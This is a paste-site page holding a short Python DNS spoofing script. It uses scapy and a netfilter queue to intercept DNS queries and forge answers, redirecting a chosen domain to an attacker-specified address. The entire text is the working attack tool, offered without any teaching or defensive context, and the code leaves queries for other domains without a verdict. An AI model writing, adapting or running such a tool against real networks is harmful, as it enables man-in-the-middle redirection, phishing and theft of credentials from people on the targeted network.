DNS spoof

mail@pastecode.io avatar
unknown
python
7 months ago
1.8 kB
7
Indexable
Never
import nfqueue
from scapy.all import *
import argparse

def spoof_dns(packet, spoof_website, redirect_website):
    scapy_packet = IP(packet.get_data())

    if scapy_packet.haslayer(DNSQR):
        qname = scapy_packet[DNSQR].qname.decode()
        if spoof_website in qname:
            print("[+] Spoofing Target: " + qname)
            answer = DNSRR(
                rrname=qname,
                rdata=redirect_website
            )
            scapy_packet[DNS].an = answer
            scapy_packet[DNS].ancount = 1

            # Recalculate IP and UDP checksums
            del scapy_packet[IP].len
            del scapy_packet[IP].chksum
            del scapy_packet[UDP].len
            del scapy_packet[UDP].chksum

            # Set the modified packet as payload
            packet.set_verdict_modified(nfqueue.NF_ACCEPT, bytes(scapy_packet), len(scapy_packet))

    else:
        packet.set_verdict(nfqueue.NF_ACCEPT)

def main():
    parser = argparse.ArgumentParser()
    parser.add_argument("-s", "--spoof", dest="spoof_website", help="Specify a website to spoof")
    parser.add_argument("-r", "--redirect", dest="redirect_website", help="Specify a website to redirect the user")
    args = parser.parse_args()

    if not args.spoof_website or not args.redirect_website:
        parser.error("[-] Please specify both the website to spoof and the redirect website. Use --help for more details.")

    q = nfqueue.queue()
    q.open()
    q.bind(socket.AF_INET)
    q.set_callback(lambda packet: spoof_dns(packet, args.spoof_website, args.redirect_website))
    q.create_queue(0)

    try:
        q.try_run()
    except KeyboardInterrupt:
        print("\n[+] Detected CTRL+C, Exiting...")
    
    q.unbind()
    q.close()

if __name__ == '__main__':
    main()